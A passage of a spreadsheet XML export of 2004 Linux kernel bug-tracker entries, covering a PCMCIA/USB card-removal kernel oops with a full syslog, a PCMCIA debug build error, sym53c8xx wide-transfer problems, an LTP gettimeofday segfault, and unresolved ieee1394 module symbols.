    <t>system crash - PCI/USB related</t>
  </si>
  <si>
    <t>2.6.4-rc1</t>
  </si>
  <si>
    <t>2004-02-29 12:44 UTC</t>
  </si>
  <si>
    <t>2004-04-05 10:35 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: ASUS 3800C laptop with usb 1.1, PCMCIA contained for a while Kouwell KW-7004 usb 2.0/ieee1394 card + USB 2.0 card reader (re-plugging this card locked the computer), or at least it seemed so. Needles to say, I've unloaded the card at the very end (the kernel crash seems to relate to the unloading procedure). Software Environment: Problem Description: I use acpi with patch for bug 2068. Alt+SysRq+S and B worked. Just before replugging in the card, I saw very weird lpsci message (see attached image file). Here is the system log which continues to the lockup (I have full kernel debug option enabled): Feb 29 20:17:24 vrapenec hub 1-0:1.0: individual port over-current protection Feb 29 20:17:24 vrapenec hub 1-0:1.0: Port indicators are not supported Feb 29 20:17:24 vrapenec hub 1-0:1.0: power on to power good time: 2ms Feb 29 20:17:24 vrapenec hub 1-0:1.0: hub controller current requirement: 0mA Feb 29 20:17:24 vrapenec hub 1-0:1.0: local power source is good Feb 29 20:17:24 vrapenec hub 1-0:1.0: no over-current condition exists Feb 29 20:17:24 vrapenec hub 1-0:1.0: enabling power on all ports Feb 29 20:17:24 vrapenec uhci_hcd 0000:00:1d.1: UHCI Host Controller Feb 29 20:17:24 vrapenec PCI: Setting latency timer of device 0000:00:1d.1 to 64 Feb 29 20:17:24 vrapenec uhci_hcd 0000:00:1d.1: irq 9, io base 0000b400 Feb 29 20:17:24 vrapenec uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 2 Feb 29 20:17:24 vrapenec uhci_hcd 0000:00:1d.1: detected 2 ports Feb 29 20:17:24 vrapenec uhci_hcd 0000:00:1d.1: root hub device address 1 Feb 29 20:17:24 vrapenec usb usb2: new device strings: Mfr=3, Product=2, SerialNumber=1 Feb 29 20:17:24 vrapenec drivers/usb/core/message.c: USB device number 1 default language ID 0x409 Feb 29 20:17:24 vrapenec usb usb2: Product: UHCI Host Controller Feb 29 20:17:24 vrapenec usb usb2: Manufacturer: Linux 2.6.4-rc1 uhci_hcd Feb 29 20:17:24 vrapenec usb usb2: SerialNumber: 0000:00:1d.1 Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:17:24 vrapenec usb usb2: registering 2-0:1.0 (config #1, interface 0) Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:17:24 vrapenec hub 2-0:1.0: usb_probe_interface Feb 29 20:17:24 vrapenec hub 2-0:1.0: usb_probe_interface - got id Feb 29 20:17:24 vrapenec hub 2-0:1.0: USB hub found Feb 29 20:17:24 vrapenec hub 2-0:1.0: 2 ports detected Feb 29 20:17:24 vrapenec hub 2-0:1.0: standalone hub Feb 29 20:17:24 vrapenec hub 2-0:1.0: unknown reserved power switching mode Feb 29 20:17:24 vrapenec hub 2-0:1.0: individual port over-current protection Feb 29 20:17:24 vrapenec hub 2-0:1.0: Port indicators are not supported Feb 29 20:17:24 vrapenec hub 2-0:1.0: power on to power good time: 2ms Feb 29 20:17:24 vrapenec hub 2-0:1.0: hub controller current requirement: 0mA Feb 29 20:17:24 vrapenec hub 2-0:1.0: local power source is good Feb 29 20:17:24 vrapenec hub 2-0:1.0: no over-current condition exists Feb 29 20:17:24 vrapenec hub 2-0:1.0: enabling power on all ports Feb 29 20:17:24 vrapenec Initializing USB Mass Storage driver... Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: registered new driver usb-storage Feb 29 20:17:24 vrapenec USB Mass Storage support registered. Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: registered new driver hiddev Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: registered new driver hid Feb 29 20:17:24 vrapenec drivers/usb/input/hid-core.c: v2.0:USB HID core driver Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: registered new mber 3 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: root hub device address 1 Feb 29 20:17:24 vrapenec usb usb3: new device strings: Mfr=3, Product=2, SerialNumber=1 Feb 29 20:17:24 vrapenec drivers/usb/core/message.c: USB device number 1 default language ID 0x409 Feb 29 20:17:24 vrapenec usb usb3: Product: OHCI Host Controller Feb 29 20:17:24 vrapenec usb usb3: Manufacturer: Linux 2.6.4-rc1 ohci_hcd Feb 29 20:17:24 vrapenec usb usb3: SerialNumber: 0000:07:00.0 Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:17:24 vrapenec usb usb3: registering 3-0:1.0 (config #1, interface 0) Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:17:24 vrapenec hub 3-0:1.0: usb_probe_interface Feb 29 20:17:24 vrapenec hub 3-0:1.0: usb_probe_interface - got id Feb 29 20:17:24 vrapenec hub 3-0:1.0: USB hub found Feb 29 20:17:24 vrapenec hub 3-0:1.0: 2 ports detected Feb 29 20:17:24 vrapenec hub 3-0:1.0: standalone hub Feb 29 20:17:24 vrapenec hub 3-0:1.0: unknown reserved power switching mode Feb 29 20:17:24 vrapenec hub 3-0:1.0: global over-current protection Feb 29 20:17:24 vrapenec hub 3-0:1.0: Port indicators are not supported Feb 29 20:17:24 vrapenec hub 3-0:1.0: power on to power good time: 2ms Feb 29 20:17:24 vrapenec hub 3-0:1.0: hub controller current requirement: 0mA Feb 29 20:17:24 vrapenec hub 3-0:1.0: local power source is good Feb 29 20:17:24 vrapenec hub 3-0:1.0: no over-current condition exists Feb 29 20:17:24 vrapenec hub 3-0:1.0: enabling power on all ports Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: created debug files Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: OHCI controller state Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: OHCI 1.0, with legacy support registers Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: control 0x083 HCFS=operational CBSR=3 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: cmdstatus 0x00000 SOC=0 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: intrstatus 0x00000004 SF Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: intrenable 0x80000002 MIE WDH Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: hcca frame #004e Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: roothub.a 01000202 POTPGT=1 NPS NDP=2 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: roothub.b 00000000 PPCM=0000 DR=0000 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: roothub.status 00000000 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: roothub.portstatus [0] 0x00000100 PPS Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.0: roothub.portstatus [1] 0x00000100 PPS Feb 29 20:17:24 vrapenec ALSA device list: Feb 29 20:17:24 vrapenec #0: Intel 82801CA-ICH3 at 0xe000, irq 11 Feb 29 20:17:24 vrapenec uhci_hcd 0000:00:1d.1: suspend_hc Feb 29 20:17:24 vrapenec NET: Registered protocol family 26 Feb 29 20:17:24 vrapenec NET: Registered protocol family 2 Feb 29 20:17:24 vrapenec PCI: Enabling device 0000:07:00.1 (0000 -&gt; 0002) Feb 29 20:17:24 vrapenec ohcegacy support registers Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: control 0x083 HCFS=operational CBSR=3 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: cmdstatus 0x00000 SOC=0 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: intrstatus 0x00000044 RHSC SF Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: intrenable 0x80000002 MIE WDH Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: hcca frame #0059 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: roothub.a 01000202 POTPGT=1 NPS NDP=2 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: roothub.b 00000000 PPCM=0000 DR=0000 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: roothub.status 00000000 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: roothub.portstatus [0] 0x00010101 CSC PPS CCS Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.1: roothub.portstatus [1] 0x00000100 PPS Feb 29 20:17:24 vrapenec PCI: Enabling device 0000:07:00.2 (0000 -&gt; 0002) Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.2: OHCI Host Controller Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.2: reset, control = 0x0 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.2: irq 11, pci mem f9869000 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.2: new USB bus registered, assigned bus number 5 Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.2: root hub device address 1 Feb 29 20:17:24 vrapenec usb usb5: new device strings: Mfr=3, Product=2, SerialNumber=1 Feb 29 20:17:24 vrapenec drivers/usb/core/message.c: USB device number 1 default language ID 0x409 Feb 29 20:17:24 vrapenec usb usb5: Product: OHCI Host Controller Feb 29 20:17:24 vrapenec usb usb5: Manufacturer: Linux 2.6.4-rc1 ohci_hcd Feb 29 20:17:24 vrapenec usb usb5: SerialNumber: 0000:07:00.2 Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:17:24 vrapenec usb usb5: registering 5-0:1.0 (config #1, interface 0) Feb 29 20:17:24 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:17:24 vrapenec hub 5-0:1.0: usb_probe_interface Feb 29 20:17:24 vrapenec hub 5-0:1.0: usb_probe_interface - got id Feb 29 20:17:24 vrapenec hub 5-0:1.0: USB hub found Feb 29 20:17:24 vrapenec hub 5-0:1.0: 2 ports detected Feb 29 20:17:24 vrapenec hub 5-0:1.0: standalone hub Feb 29 20:17:24 vrapenec hub 5-0:1.0: unknown reserved power switching mode Feb 29 20:17:24 vrapenec hub 5-0:1.0: global over-current protection Feb 29 20:17:24 vrapenec hub 5-0:1.0: Port indicators are not supported Feb 29 20:17:24 vrapenec hub 5-0:1.0: power on to power good time: 2ms Feb 29 20:17:24 vrapenec hub 5-0:1.0: hub controller current requirement: 0mA Feb 29 20:17:24 vrapenec hub 5-0:1.0: local power source is good Feb 29 20:17:24 vrapenec hub 5-0:1.0: no over-current condition exists Feb 29 20:17:24 vrapenec hub 5-0:1.0: enabling power on all ports Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.2: created debug files Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.2: OHCI controller state Feb 29 20:17:24 vrapenec ohci_hcd 0000:07:00.2: OHCI 1.0, withusb.c: usb_hotplug Feb 29 20:17:24 vrapenec hub 6-0:1.0: usb_probe_interface Feb 29 20:17:24 vrapenec hub 6-0:1.0: usb_probe_interface - got id Feb 29 20:17:24 vrapenec hub 6-0:1.0: USB hub found Feb 29 20:17:24 vrapenec hub 6-0:1.0: 6 ports detected Feb 29 20:17:24 vrapenec hub 6-0:1.0: standalone hub Feb 29 20:17:24 vrapenec hub 6-0:1.0: individual port power switching Feb 29 20:17:24 vrapenec hub 6-0:1.0: individual port over-current protection Feb 29 20:17:24 vrapenec hub 6-0:1.0: Single TT Feb 29 20:17:24 vrapenec hub 6-0:1.0: TT requires at most 8 FS bit times Feb 29 20:17:24 vrapenec hub 6-0:1.0: Port indicators are not supported Feb 29 20:17:24 vrapenec hub 6-0:1.0: power on to power good time: 20ms Feb 29 20:17:24 vrapenec hub 6-0:1.0: hub controller current requirement: 0mA Feb 29 20:17:24 vrapenec hub 6-0:1.0: local power source is good Feb 29 20:17:24 vrapenec hub 6-0:1.0: no over-current condition exists Feb 29 20:17:24 vrapenec hub 6-0:1.0: enabling power on all ports Feb 29 20:17:24 vrapenec PCI: Enabling device 0000:07:00.4 (0000 -&gt; 0002) Feb 29 20:17:24 vrapenec PCI: Setting latency timer of device 0000:07:00.4 to 64 Feb 29 20:17:24 vrapenec ohci1394: fw-host1: OHCI-1394 1.1 (PCI): IRQ=[11] MMIO=[41003000-410037ff] Max Packet=[2048] Feb 29 20:17:24 vrapenec ip1394: eth2: IEEE-1394 IPv4 over 1394 Ethernet (fw-host1) Feb 29 20:17:24 vrapenec hub 4-0:1.0: debounce: port 1: delay 400ms stable 0 status 0x100 Feb 29 20:17:24 vrapenec hub 4-0:1.0: connect-debounce failed, port 1 disabled Feb 29 20:17:24 vrapenec ehci_hcd 0000:07:00.3: GetStatus port 3 status 001803 POWER sig=j CSC CONNECT Feb 29 20:17:24 vrapenec hub 6-0:1.0: port 3, status 501, change 1, 480 Mb/s Feb 29 20:17:24 vrapenec hub 6-0:1.0: debounce: port 3: delay 100ms stable 4 status 0x501 Feb 29 20:17:24 vrapenec ehci_hcd 0000:07:00.3: port 3 high speed Feb 29 20:17:24 vrapenec ehci_hcd 0000:07:00.3: GetStatus port 3 status 001005 POWER sig=se0 PE CONNECT Feb 29 20:17:24 vrapenec usb 6-3: new high speed USB device using address 2 Feb 29 20:17:24 vrapenec drivers/usb/core/config.c: unable to get descriptor Feb 29 20:17:24 vrapenec usb 6-3: can't read configurations, error -32 Feb 29 20:17:24 vrapenec ehci_hcd 0000:07:00.3: port 3 high speed Feb 29 20:17:24 vrapenec ehci_hcd 0000:07:00.3: GetStatus port 3 status 001005 POWER sig=se0 PE CONNECT Feb 29 20:17:24 vrapenec usb 6-3: new high speed USB device using address 3 Feb 29 20:17:24 vrapenec ehci_hcd 0000:07:00.3: devpath 3 ep0in 3strikes Feb 29 20:17:24 vrapenec usb 6-3: new device strings: Mfr=0, Product=3, SerialNumber=4 Feb 29 20:17:24 vrapenec drivers/usb/core/message.c: USB device number 3 default language ID 0x409 Feb 29 20:17:24 vrapenec usb 6-3: Product: Flash Reader Feb 29 20:17:24 vrapenec usb 6-3: SerialNumber: 03457 Feb 29 20:17:25 vrapenec drivers/usb/&lt;7&gt;ehci_hcd 0000:07:00.3: devpath 3 ep0in 3strikes Feb 29 20:17:25 vrapenec ehci_hcd 0000:07:00.3: devpath 3 ep0in 3strikes Feb 29 20:17:25 vrapenec ehci_hcd 0000:07:00.3: devpath 3 ep0in 3strikes Feb 29 20:17:25 vrapenec ehci_hcd 0000:07:00.3: devpath 3 ep0in 3strikes Feb 29 20:17:26 vrapenec lp0: using parport0 (polling). Feb 29 20:17:27 vrapenec eth0: link up, 100Mbps, full-duplex, lpa 0x45E1 Feb 29 20:17:41 vrapenec atkbd.c: Unknown key released (translated set 2, code 0x7a on isa0060/serio0). Feb 29 20:17:41 vrapenec atkbd.c: This is an XFree86 bug. It shouldn't access hardware directly. Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: device removed! Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: HC died; cleaning up Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.1: device removed! Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.1: HC died; cleaning up Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: device removed! Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: HC died; cleaning up Feb 29 20:33:30 vrapenec ehci_hcd 0000:07:00.3: device removed Feb 29 20:33:30 vrapenec ehci_hcd 0000:07:00.3: reset command ffffffff park=3 ithresh=63 LReset IAAD Async Periodic period=?? R Feb 29 20:33:30 vrapenec ehci_hcd 0000:07:00.3: HC died; cleaning up Feb 29 20:33:30 vrapenec usb 6-3: USB disconnect, address 3 Feb 29 20:33:30 vrapenec usb 6-3: usb_disable_device nuking all URBs Feb 29 20:33:30 vrapenec usb 6-3: unregistering interface 6-3:1.0 Feb 29 20:33:30 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:33:30 vrapenec usb 6-3: unregistering device Feb 29 20:33:30 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: roothub graceful disconnect Feb 29 20:33:30 vrapenec usb usb3: usb_disable_device nuking all URBs Feb 29 20:33:30 vrapenec usb usb3: unregistering interface 3-0:1.0 Feb 29 20:33:30 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:33:30 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: OHCI controller state Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: control 0xffffffff RWE RWC IR HCFS=suspend BLE CLE IE PLE CBSR=3 Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: intrstatus 0xffffffff MIE OC RHSC FNO UE RD SF WDH SO Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: ed_periodcurrent ffffffff Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: ed_controlcurrent ffffffff Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: ed_bulkcurrent ffffffff Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.0: hcca frame #1add Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.1: remove, state 0 Feb 29 20:33:30 vrapenec usb usb4: USB disconnect, address 1 Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.1: shutdown urb f7a77938 pipe 40408180 ep1in-intr Feb 29 20:33:30 vrapenec usb usb4: hcd_unlink_urb f7a77938 fail -22 Feb 29 20:33:30 vrapenec usb usb4: unregistering device Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.1: stop operational controller (state 0x00) Feb 29 20:33:30 vrapenec usb usb5: unregistering device Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: stop operational controller (state 0x00) Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: OHCI 3.15, with legacy support registers Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: cmdstatus 0xffffffff SOC=3 OCR BLF CLF HCR Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: intrenable 0xffffffff MIE OC RHSC FNO UE RD SF WDH SO Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: ed_controlhead ffffffff Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: ed_bulkhead ffffffff Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: donehead ffffffff Feb 29 20:33:30 vrapenec ohci_hcd 0000:07:00.2: USB bus 5 deregistered Feb 29 20:33:30 vrapenec ehci_hcd 0000:07:00.3: roothub graceful disconnect Feb 29 20:33:30 vrapenec usb usb6: usb_disable_device nuking all URBs Feb 29 20:33:30 vrapenec usb usb6: unregistering interface 6-0:1.0 Feb 29 20:33:30 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:33:30 vrapenec drivers/usb/core/usb.c: usb_hotplug Feb 29 20:33:30 vrapenec ehci_hcd 0000:07:00.3: reset command ffffffff park=3 ithresh=63 LReset IAAD Async Periodic period=?? R Feb 29 20:33:30 vrapenec ehci_hcd 0000:07:00.3: dma_pool_destroy ehci_qh, f7997000 busy Feb 29 20:33:30 vrapenec ehci_hcd 0000:07:00.3: complete 45 unlink 0 Feb 29 20:33:30 vrapenec ehci_hcd 0000:07:00.3: USB bus 6 deregistered Feb 29 20:33:30 vrapenec Unable to handle kernel NULL pointer dereference at virtual address 00000000 Feb 29 20:33:30 vrapenec printing eip: Feb 29 20:33:30 vrapenec c032747b Feb 29 20:33:30 vrapenec *pde = 00000000 Feb 29 20:33:30 vrapenec Oops: 0000 [#1] Feb 29 20:33:30 vrapenec PREEMPT Feb 29 20:33:30 vrapenec CPU: 0 Feb 29 20:33:30 vrapenec EIP: 0060:[&lt;c032747b&gt;] Not tainted Feb 29 20:33:30 vrapenec EFLAGS: 00010296 Feb 29 20:33:30 vrapenec EIP is at dv1394_remove_host+0x1b/0xcf Feb 29 20:33:30 vrapenec eax: c056aa00 ebx: c0579660 ecx: f7b54000 edx: f7b08000 Feb 29 20:33:30 vrapenec esi: 00000000 edi: c04c266a ebp: 00000000 esp: f7b55e5c Feb 29 20:33:30 vrapenec ds: 007b es: 007b ss: 0068 Feb 29 20:33:30 vrapenec Process pccardd (pid: 16, threadinfo=f7b54000 task=f7b57880) Feb 29 20:33:30 vrapenec Stack: f799d4c8 f795381c c0579660 c056aa24 f7b08000 f7b6956c c031069a f7b08000 Feb 29 20:33:30 vrapenec f7953820 c05793a0 00000000 c0579660 c0579660 c056aa24 f7b08000 f7b6956c Feb 29 20:33:30 vrapenec c0311089 c0579660 f7b08000 00000000 f7b08000 f7b09d28 f7b54000 c0310072 Feb 29 20:33:30 vrapenec Call Trace: Feb 29 20:33:30 vrapenec [&lt;c031069a&gt;] __unregister_host+0xdc/0xe1 Feb 29 20:33:30 vrapenec [&lt;c0311089&gt;] highlevel_remove_host+0x45/0x73 Feb 29 20:33:30 vrapenec [&lt;c0310072&gt;] hpsb_remove_host+0x24/0x48 Feb 29 20:33:30 vrapenec [&lt;c031cca5&gt;] ohci1394_pci_remove+0x57/0x249 Feb 29 20:33:30 vrapenec [&lt;c02351c1&gt;] pci_device_remove+0x3b/0x3d Feb 29 20:33:30 vrapenec [&lt;c02b4d4d&gt;] device_release_driver+0x64/0x66 Feb 29 20:33:30 vrapenec [&lt;c02b4e71&gt;] bus_remove_device+0x55/0x96 Feb 29 20:33:30 vrapenec [&lt;c02b3f3e&gt;] device_del+0x5d/0x9b Feb 29 20:33:30 vrapenec [&lt;c02b3f8f&gt;] device_unregister+0x13/0x23 Feb 29 20:33:30 vrapenec [&lt;c02331bb&gt;] pci_destroy_dev+0x1c/0x89 Feb 29 20:33:30 vrapenec [&lt;c0233301&gt;] pci_remove_behind_bridge+0x27/0x3e Feb 29 20:33:30 vrapenec [&lt;c034adb0&gt;] shutdown_socket+0x75/0x128 Feb 29 20:33:30 vrapenec [&lt;c034af92&gt;] socket_shutdown+0x4a/0x5e Feb 29 20:33:30 vrapenec [&lt;c034b507&gt;] socket_remove+0x13/0x68 Feb 29 20:33:30 vrapenec [&lt;c034b5ba&gt;] socket_detect_change+0x5e/0x7e Feb 29 20:33:30 vrapenec [&lt;c034b771&gt;] pccardd+0x197/0x214 Feb 29 20:33:30 vrapenec [&lt;c011e849&gt;] preempt_schedule+0x2a/0x43 Feb 29 20:33:30 vrapenec [&lt;c011e862&gt;] default_wake_function+0x0/0x12 Feb 29 20:33:30 vrapenec [&lt;c01090d2&gt;] ret_from_fork+0x6/0x14 Feb 29 20:33:30 vrapenec [&lt;c011e862&gt;] default_wake_function+0x0/0x12 Feb 29 20:33:30 vrapenec [&lt;c034b5da&gt;] pccardd+0x0/0x214 Feb 29 20:33:30 vrapenec [&lt;c0107255&gt;] kernel_thread_helper+0x5/0xb Feb 29 20:33:30 vrapenec Feb 29 20:33:30 vrapenec Code: ac ae 75 08 84 c0 75 f8 31 c0 eb 04 19 c0 0c 01 85 c0 0f 85 The computer has been booted up with the PCMCIA card plugged in. Once I have unplugged the card. The computer fan went on max rpm when the PCMCIA card has been replugged in again. The card was unloaded once, then sys magic keys and reboot. Steps to reproduce:</t>
  </si>
  <si>
    <t>drivers/pcmcia/ds.c: can't compile when CONFIG_PCMCIA_DEBUG is set</t>
  </si>
  <si>
    <t>2004-03-01 07:40 UTC</t>
  </si>
  <si>
    <t>Michael Opdenacker</t>
  </si>
  <si>
    <t>2004-03-31 03:24 UTC</t>
  </si>
  <si>
    <t>Distribution: any Hardware Environment: any Software Environment: any Problem Description: If you set CONFIG_PCMCIA_DEBUG (and of course activate PCMCIA support), you get the below errors when you compile the drivers/pcmcia/ds.c file: drivers/pcmcia/ds.c: In function `ds_read': drivers/pcmcia/ds.c:569: error: `inode' undeclared (first use in this function) drivers/pcmcia/ds.c:569: error: (Each undeclared identifier is reported only once drivers/pcmcia/ds.c:569: error: for each function it appears in.) drivers/pcmcia/ds.c: In function `ds_write': drivers/pcmcia/ds.c:597: error: `inode' undeclared (first use in this function) drivers/pcmcia/ds.c: In function `ds_poll': drivers/pcmcia/ds.c:631: error: `inode' undeclared (first use in this function) The "DEBUG" statements causing these errors should be updated to use only defined symbols. I don't propose a patch because I'm not familiar with this code and don't know what the DEBUG statements are really supposed to tell. However, this should be pretty easy to fix. If no-one wants to maintain this CONFIG_PCMCIA_DEBUG option and fix the DEBUG macro calls, another option is to remove this option as well as the DEBUG macro calls. Steps to reproduce: 1/ Configure your kernel ("make xconfig" for example) 2/ Turn on PCMCIA debugging (PCMCIA_DEBUG) ("y" or "m") 3/ Run "make" Thanks for everything! Cheers, Michael.</t>
  </si>
  <si>
    <t>sym53c8xx: too noisy during domain validation / lacks boot parameter to turn wide transfers off</t>
  </si>
  <si>
    <t>sym53c8xx</t>
  </si>
  <si>
    <t>2.6.10</t>
  </si>
  <si>
    <t>2004-03-02 01:25 UTC</t>
  </si>
  <si>
    <t>Florian Roscher</t>
  </si>
  <si>
    <t>2006-04-20 04:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable (sid) Hardware Environment: Mainboard: Asus A7V333 CPU: AMD Athlon(TM) XP 1700+ RAM: 768MB SCSI-Controller: Dawicontrol "DC-2975 U" Software Environment: Kernel 2.6.x ( x&lt;=3) - Lilo v22.5.8 as boot manager Problem Description: Terse: I do own an SCSI host controller from Dawicontrol ( http://www.dawicontrol.com/ ). Model name is "DC-2975 U". Using this controller with driver sym53c8xx is possible when option wide:0 is active. This worked fine with kernel 2.4.x. The new sym53c8xx_2 driver breaks this as the option is not longer supported although it is documented. Verbose: This controller only has narrow connectors, but uses a chip which would support wide devices. This problem is known and documented within the 2.6.x kernel documentation - File "Documentation/scsi/sym53c8xx_2.txt": &gt; 10.2.9 Max wide &gt; wide:1 wide scsi enabled &gt; wide:0 wide scsi disabled &gt; Some scsi boards use a 875 (ultra wide) and only supply narrow connectors. &gt; If you have connected a wide device with a 50 pins to 68 pins cable &gt; converter, any accepted wide negotiation will break further data transfers. &gt; In such a case, using "wide:0" in the bootup command will be helpfull. The controller works fine with linux 2.4.x when "wide:0" is set. But it looks like this option is not supported with linux 2.6.3. When booting 2.6.3 kernels I do get parity errors. I do get the same errors when running kernel 2.4.x without the option "wide:0". I was able to get my scsi controller running with 2.6.x/sym53c8xx_2 by applying a crude hack. I will try to attach it to this report. Steps to reproduce: Boot kernel 2.6.3 with SCSI controller Dawicontrol "DC-2975 U" installed. Regards Florian</t>
  </si>
  <si>
    <t>ltp test gettimeofday01 segfault with vsyscall-gtod</t>
  </si>
  <si>
    <t>2.6.3+vsyscall-gtod-B2</t>
  </si>
  <si>
    <t>2004-03-02 08:58 UTC</t>
  </si>
  <si>
    <t>2005-04-13 07:35 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES Hardware Environment: 8way-PIII700, 16GB Software Environment: gcc-3.3.2,2.6.3 kernel, vsyscall-gtod-B2 from lkml Problem Description: Running the gettimeofday01 test from latest ltp, I get: gettimeofday01 1 BROK : Unexpected signal 11 received. gdb backtrace from core file: (gdb) bt #0 0xffffc187 in ?? () #1 0xffffffff in ?? () #2 0x4001a020 in __libc_missing_32bit_uids () from /lib/ld-linux.so.2 #3 0x0804ab80 in cat_file () #4 0xffffe421 in ?? () #5 0xffffffff in ?? () #6 0xffffffff in ?? () #7 0x40162f4c in __DTOR_END__ () from /lib/tls/libc.so.6 #8 0x400c3346 in gettimeofday () from /lib/tls/libc.so.6 #9 0x08048c5e in main (ac=1, av=0xbffff4e4) at gettimeofday01.c:82 Line 82 is where it calls gettimeofday((void *)-1, (void *)-1)) and expects to get back EFAULT. On pure 2.6.3 it does get EFAULT. Steps to reproduce: Run gettimeofday01 from LTP with the vsyscall-gtod patch applied.</t>
  </si>
  <si>
    <t>vesafb: the monitor loses the signal after the program ends (links)</t>
  </si>
  <si>
    <t>2004-03-02 09:37 UTC</t>
  </si>
  <si>
    <t>Alessandro Fernandes Martins</t>
  </si>
  <si>
    <t>2005-08-15 17:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: Intel Pentium II 400MHz, 64 MB RAM Software Environment: Links 2.1pre11 Problem Description: When I finish the program "links" in graphical mode (framebuffer) the monitor loses the signal, but I can remotelly access the machine. The same problem happens in the kernel version: 2.6.2. Steps to reproduce: 1. Start the "links" with "-g" option: i.e.: links -g www.kernel.org 2. Exit the program "links".</t>
  </si>
  <si>
    <t>Unknown symbols in the ieee1394 and ohci1394 modules</t>
  </si>
  <si>
    <t>2.6.4-rc1-bk3 (2.6.4-rc1-mm1)</t>
  </si>
  <si>
    <t>2004-03-02 13:29 UTC</t>
  </si>
  <si>
    <t>2004-04-05 10:16 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.0 64-bit (x86_64) Hardware Environment: 2 x AMD Opteron 240, Tyan Thunder K8W, 1 GB RAM (4 x 256, two nodes, dual-channel), LSI 53C1010 64-bit SCSI + 2 x HDD (IBM), NEC-based USB 2.0 adapter (Manhattan), GeForce FX5200 (LeadTek), 2 x SATA HDD (Seagate, Samsung), IDE DVD (Liteon), IDE DVDR (Liteon) Software Environment: SuSE 9.0 (downloadable version) + KDE 3.2 (from kde.org) + kernel 2.6.4-rc1-bk3 (2.6.3-rc1-mm1) Problem Description: There are some unknown symbols in the ohci1394 and ieee1394 modules which prevents the kernel from loading them. Here's the dmesg output: ieee1394: Unknown symbol kernel_locked ohci1394: Unknown symbol hpsb_iso_wake ohci1394: Unknown symbol hpsb_packet_received ohci1394: Unknown symbol dma_prog_region_free ohci1394: Unknown symbol hpsb_add_host ohci1394: Unknown symbol dma_prog_region_init ohci1394: Unknown symbol dma_prog_region_alloc ohci1394: Unknown symbol 